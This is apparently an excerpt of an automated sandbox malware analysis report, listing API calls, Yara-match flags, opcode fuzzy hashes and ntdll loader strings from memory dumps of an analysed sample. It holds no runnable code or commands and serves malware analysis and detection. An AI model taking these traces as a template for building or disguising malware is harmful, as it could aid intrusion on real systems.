                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 7421c0402db8c27a6277c94cc422d1c6e19e1d36f941628413aa469eddaa49b7
                                                                                  • Instruction ID: 908e2b593f21f36a93449136b2053701b584df330a8bf52d20a63e9a86b79a9c
                                                                                  • Opcode Fuzzy Hash: 7421c0402db8c27a6277c94cc422d1c6e19e1d36f941628413aa469eddaa49b7
                                                                                  • Instruction Fuzzy Hash: 9A90023160550412E60071588514706100587D1341F65C422A0428568E8B998A5275A6

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: de3d6622b2c7e253488efd82844506778fe438f6aa130dcb7ce2e9c228e4284e
                                                                                  • Instruction ID: 7251796555732349115f912c6c4c209aa57bdead8f3eb1923ae9839e20d07678
                                                                                  • Opcode Fuzzy Hash: de3d6622b2c7e253488efd82844506778fe438f6aa130dcb7ce2e9c228e4284e
                                                                                  • Instruction Fuzzy Hash: A721FEB2A092587ADB015BB85C418FEBB6CCF42374B0482AFF884DB282D26D4D8343D1

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: 9c4519be433183e511d57a0ca24e41333fd38ee9197568bd8c116b46864e7620
                                                                                  • Instruction ID: fb6054b137b1b7a90670ef45b58f19e18da369be72312329e7a814f8d004de60
                                                                                  • Opcode Fuzzy Hash: 9c4519be433183e511d57a0ca24e41333fd38ee9197568bd8c116b46864e7620
                                                                                  • Instruction Fuzzy Hash: D601DBB1D4021C7EEB11AAE59C81DEF7B7CDF41798F04806AF904B7241E67C4E4647A5

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: 0a07cd0e95027d051652f65d03272d9818b42054f858fe44f33b56e8d39d78d9
                                                                                  • Instruction ID: 304f4617cef094d7948f8b4e0ba8c288fe5f41b46d30d6681db389c3092ba291
                                                                                  • Opcode Fuzzy Hash: 0a07cd0e95027d051652f65d03272d9818b42054f858fe44f33b56e8d39d78d9
                                                                                  • Instruction Fuzzy Hash: 8601DBB1D0021C7ADB10AAE59C81DEF7B7CDF41798F04806AF90467241E67C4E4647A5

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: 9917860a06c5491fd7527a9a567e0fdb5327c2d310581294f1f00c85882a137f
                                                                                  • Instruction ID: a03890bf0caf07f143295e344698684d57de9b4f9a149aaa8d59faff12e514fd
                                                                                  • Opcode Fuzzy Hash: 9917860a06c5491fd7527a9a567e0fdb5327c2d310581294f1f00c85882a137f
                                                                                  • Instruction Fuzzy Hash: 150166B2D04218B9DB10EAA58C82CEF7B7CDF81358F0481AAF914B7240D67C4A474BA4

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 130 42cbc3-42cc01 call 4046d3 call 42dad3 RtlAllocateHeap
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,0041E774,?,?,00000000,?,0041E774,?,?,?), ref: 0042CBFC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction ID: d1daadd5b738771fcf8a8578342262517393979b432d42d69ec70eba3b553b61
                                                                                  • Opcode Fuzzy Hash: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction Fuzzy Hash: 48E092716042087FC610EE59EC42E9B37ACDFC9754F008419F908A7242D670BD1087B9

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 135 42cc03-42cc44 call 4046d3 call 42dad3 RtlFreeHeap
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,558D0001,00000007,00000000,00000004,00000000,004171F6,000000F4), ref: 0042CC3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                  • Instruction ID: a8743f59d5fd6b324e8fb9b63301b2ee65a769d322d9c6f3b811b81c9c5f29be
                                                                                  • Opcode Fuzzy Hash: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                  • Instruction Fuzzy Hash: D1E092716042157BC610EE49DC41F9B73ACDFC5710F004419FE08A7242D670BD2087B8

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 145 42cc53-42cc8f call 4046d3 call 42dad3 ExitProcess
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,BED2F641,?,?,BED2F641), ref: 0042CC8A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: 6d0d9633f36f3a478799886893dbf0fc3395856193f855968f02c457220dfeca
                                                                                  • Instruction ID: f890e39a49fc289f0e184355a012a96589c9f26d3f4f8871f3224b84e537ea6d
                                                                                  • Opcode Fuzzy Hash: 6d0d9633f36f3a478799886893dbf0fc3395856193f855968f02c457220dfeca
                                                                                  • Instruction Fuzzy Hash: 74E08C326042247BD220FA5ADC02FDB77ACDFC5714F01481AFA09A7242C6B5B91287F9

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 150 f82c0a-f82c0f 151 f82c1f-f82c26 LdrInitializeThunk 150->151 152 f82c11-f82c18 150->152
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b61f3cf6200f1af4a33e4bbd3929615671e8d8346c8f5e0be5e10e9365f1939f
                                                                                  • Instruction ID: 9e29f36098e58cbab66a1734697e1c9bd8d2675e909f204fca5d924a9df53a8d
                                                                                  • Opcode Fuzzy Hash: b61f3cf6200f1af4a33e4bbd3929615671e8d8346c8f5e0be5e10e9365f1939f
                                                                                  • Instruction Fuzzy Hash: D2B09B71D015C5D5EF51F760460871B790067D1751F15C072D2034645F473CD5D1F275
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: a28e66cb5d43058f4a8e003e64970352901367480a9736f3a3578d980294e140
                                                                                  • Instruction ID: 9e567d75716230914aae7c14a88539a6bf856803a1b605cab23a5a755382248a
                                                                                  • Opcode Fuzzy Hash: a28e66cb5d43058f4a8e003e64970352901367480a9736f3a3578d980294e140
                                                                                  • Instruction Fuzzy Hash: 0B92AB71A04342AFD760DF24C982F6AB7E8FB84760F04482DFA94D7291D774E944EB92
                                                                                  Strings
                                                                                  • Critical section address., xrefs: 00FB5502
                                                                                  • Critical section debug info address, xrefs: 00FB541F, 00FB552E
                                                                                  • corrupted critical section, xrefs: 00FB54C2
                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB540A, 00FB5496, 00FB5519
                                                                                  • Address of the debug info found in the active list., xrefs: 00FB54AE, 00FB54FA
                                                                                  • 8, xrefs: 00FB52E3
                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB54E2
                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 00FB5543
                                                                                  • Thread identifier, xrefs: 00FB553A
                                                                                  • undeleted critical section in freed memory, xrefs: 00FB542B
                                                                                  • Critical section address, xrefs: 00FB5425, 00FB54BC, 00FB5534
                                                                                  • double initialized or corrupted critical section, xrefs: 00FB5508
                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB54CE
                                                                                  • Invalid debug info address of this critical section, xrefs: 00FB54B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                  • API String ID: 0-2368682639
                                                                                  • Opcode ID: a641835451a4fff54772882f4b2214e0fdcf1fd8efa1d3c0921405222305a275
                                                                                  • Instruction ID: 59ac8b8a45c1e3c4c831c9a8f8a75194531404127740ae20c5f2da386e520040
                                                                                  • Opcode Fuzzy Hash: a641835451a4fff54772882f4b2214e0fdcf1fd8efa1d3c0921405222305a275
                                                                                  • Instruction Fuzzy Hash: CA81ABB1E41758AFEB20CF95D845BEEBBB5AB08B24F244019F508B7280C779AD41EB51
                                                                                  Strings
                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00FB2624
                                                                                  • @, xrefs: 00FB259B
                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00FB2506
                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00FB22E4
                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00FB24C0
                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00FB2602
                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00FB25EB
                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00FB2409
                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00FB2498
                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 00FB261F
                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00FB2412
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                  • API String ID: 0-4009184096
                                                                                  • Opcode ID: 082e019aafc63b3303a2f187aede2eca5961cc5b792b9aa8235904ca86a8f13f
                                                                                  • Instruction ID: 20fd3bdd98dad365f58f7eb5b9cbc7da666b450ce35f9edc1e9d6968f7667fdf
                                                                                  • Opcode Fuzzy Hash: 082e019aafc63b3303a2f187aede2eca5961cc5b792b9aa8235904ca86a8f13f
                                                                                  • Instruction Fuzzy Hash: 570260B2D002289BDB71DB14CC81BDDB7B8AB54314F0441EAE64DA7241DB35AF84EF5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                  • API String ID: 0-2515994595
                                                                                  • Opcode ID: 4a8b2997a50200861f097135928ad8ab0f4fe41fe17b5d9d52fcd10fd81564f7
                                                                                  • Instruction ID: 7f7cf886162b45346146ba9f20a373ac3a609408b03743ce84df317d80f38e2a
                                                                                  • Opcode Fuzzy Hash: 4a8b2997a50200861f097135928ad8ab0f4fe41fe17b5d9d52fcd10fd81564f7
                                                                                  • Instruction Fuzzy Hash: 6151D3715083919BC335EF198C44BABBBE8BF843A0F24491EF85D83181EB70D945E7A2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                  • API String ID: 0-1700792311
                                                                                  • Opcode ID: 7220b3052e1991e925bd5f94dc33b092a663d4ef34c0ba1d25569cf3ef82ce53
                                                                                  • Instruction ID: b64594d385b9418dd989b77106dca68b901e607b2a8ba884e346e2e4c9fe69d0
                                                                                  • Opcode Fuzzy Hash: 7220b3052e1991e925bd5f94dc33b092a663d4ef34c0ba1d25569cf3ef82ce53
                                                                                  • Instruction Fuzzy Hash: C9D1D031900689DFCB22DF68C851ABDBBF1FF49720F088059E6459B263CB39D981EB10
                                                                                  Strings
                                                                                  • VerifierDebug, xrefs: 00FC8CA5
                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00FC8A3D
                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00FC8A67
                                                                                  • VerifierFlags, xrefs: 00FC8C50
                                                                                  • VerifierDlls, xrefs: 00FC8CBD
                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 00FC8B8F
                                                                                  • HandleTraces, xrefs: 00FC8C8F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                  • API String ID: 0-3223716464
                                                                                  • Opcode ID: f2bf20de3203455af497e2d17e2d4ef89ccd4a9c865e12f3ee21ace71a8c2b07
                                                                                  • Instruction ID: b0819d7eb16ddcc8b186dc7825fd56457ae4d641d360b4515567760ae7b13356
                                                                                  • Opcode Fuzzy Hash: f2bf20de3203455af497e2d17e2d4ef89ccd4a9c865e12f3ee21ace71a8c2b07
                                                                                  • Instruction Fuzzy Hash: E0914872A05712AFC321DF68DE83F5A77A8BB84760F05441DF9816B291CB78EC06E791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                  • API String ID: 0-1109411897
                                                                                  • Opcode ID: 6b2fa83eaff73473c4cbad69f67b274537c04dbce707b999293ae98458967b60
                                                                                  • Instruction ID: 08bbd55141d56afe252836feb142cdeec6a5cf7233e2122ede9be5b3e7216a10
                                                                                  • Opcode Fuzzy Hash: 6b2fa83eaff73473c4cbad69f67b274537c04dbce707b999293ae98458967b60
                                                                                  • Instruction Fuzzy Hash: 1CA24C75E056298FDB64CF18CC887A9BBB5BF85314F2442E9D80DA7250DB74AE85EF00
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-792281065
                                                                                  • Opcode ID: f71369f2b01ee1078b8071e8dcd0ffcacf042eb32aee8b9a96c627eaa95fd2e9
                                                                                  • Instruction ID: a87aa24b23a5bac97cb0f7008ea3d9d155c891565faaf7878bf1ecc214073adc
                                                                                  • Opcode Fuzzy Hash: f71369f2b01ee1078b8071e8dcd0ffcacf042eb32aee8b9a96c627eaa95fd2e9
                                                                                  • Instruction Fuzzy Hash: 7D916931E00710ABDB35EF15ED45BEA37A4BF41B24F14412AF944AB2C2D779A841FB92
                                                                                  Strings
                                                                                  • LdrpInitShimEngine, xrefs: 00F999F4, 00F99A07, 00F99A30
                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 00F99A11, 00F99A3A
                                                                                  • apphelp.dll, xrefs: 00F36496
                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00F99A01
                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00F99A2A
                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00F999ED
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-204845295
                                                                                  • Opcode ID: 6da634ccf37575eee5d3ae296292c5144623c9b58cdf4b1230bdbce180736850
                                                                                  • Instruction ID: a1c26a7fdf087e4b6e52d2b0d6ca198cdc2fd9a53050fcbab1561c32b519c5c1
                                                                                  • Opcode Fuzzy Hash: 6da634ccf37575eee5d3ae296292c5144623c9b58cdf4b1230bdbce180736850
                                                                                  • Instruction Fuzzy Hash: 5351D171608300ABE720DF24DC82BAB77E8FB84754F00491DF5859B1A1D778E904EB92
                                                                                  Strings
                                                                                  • LdrpInitializeProcess, xrefs: 00F7C6C4
                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 00FB81E5
• minkernel\ntdll\ldrinit.c, xrefs: 00F7C6C3
• minkernel\ntdll\ldrredirect.c, xrefs: 00FB8181, 00FB81F5
• Loading import redirection DLL: '%wZ', xrefs: 00FB8170
• LdrpInitializeImportRedirection, xrefs: 00FB8177, 00FB81EB
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
• API String ID: 0-475462383
• Opcode ID: e35f35d2a19e9c892a9870687dd30286ce70cdcd741e4b5e152ed20d47640c44
• Instruction ID: fe06095576291c647f9192054226eacc5d406c6bbd1c7a90b2a5b61877e71f76
• Opcode Fuzzy Hash: e35f35d2a19e9c892a9870687dd30286ce70cdcd741e4b5e152ed20d47640c44
• Instruction Fuzzy Hash: 4A310B716443159FC220EF68DD87E5A7798FFC5B10F04452CF8889B291DA28DD05EBA3

Strings
• RtlGetAssemblyStorageRoot, xrefs: 00FB2160, 00FB219A, 00FB21BA
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 00FB21BF
• SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 00FB2178
• SXS: %s() passed the empty activation context, xrefs: 00FB2165
• SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 00FB2180
• SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 00FB219F
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
• API String ID: 0-861424205
• Opcode ID: ca9a892f491cb0b2b6cad727e4e41787acabee67e789ff12a29b41e7bf0d19f4
• Instruction ID: 87fa217a3a256f02c76dee81986bf3ef1dd9201d0e48017de2e7286123808e43
• Opcode Fuzzy Hash: ca9a892f491cb0b2b6cad727e4e41787acabee67e789ff12a29b41e7bf0d19f4
• Instruction Fuzzy Hash: AF315C36F0032177E7219A598C86FDFB778DB54B50F15405ABA0877241D270DE01FBA2

APIs
  • Part of subcall function 00F82DF0: LdrInitializeThunk.NTDLL ref: 00F82DFA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80BA3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80BB6
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80D60
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00F80D74
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
• String ID:
• API String ID: 1404860816-0
• Opcode ID: 8f550626082fd000e19d6cd748258ca2265d86769ca46ff813b20e73e6a71695
• Instruction ID: a6000922a38e5ec15ba7a29d783e079ebd3cb490cb49413de746b191b76c10e3
• Opcode Fuzzy Hash: 8f550626082fd000e19d6cd748258ca2265d86769ca46ff813b20e73e6a71695
• Instruction Fuzzy Hash: 7C426B72900715DFDB60DF64C881BEAB7F4BF04310F1485A9E999EB241EB74AA84DF60

Strings
Memory Dump Source
• Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_f10000_file.jbxd
Similarity
• API ID:
• String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
• API String ID: 0-379654539
• Opcode ID: e8fe3d71ef1451c8713fdbcdae6aef298800eb820af5bb1a523819cafb880baf
• Instruction ID: 5c4cdf5ddfef660705167e3d1c4d62905b61aa86798af2dbe0e160808eb7c9cb
• Opcode Fuzzy Hash: e8fe3d71ef1451c8713fdbcdae6aef298800eb820af5bb1a523819cafb880baf
• Instruction Fuzzy Hash: E6C19BB56483828FD711CF18C540B6ABBE4FF85714F04486AFC958B261E778CA49EB53

Strings
• LdrpInitializeProcess, xrefs: 00F78422
• minkernel\ntdll\ldrinit.c, xrefs: 00F78421
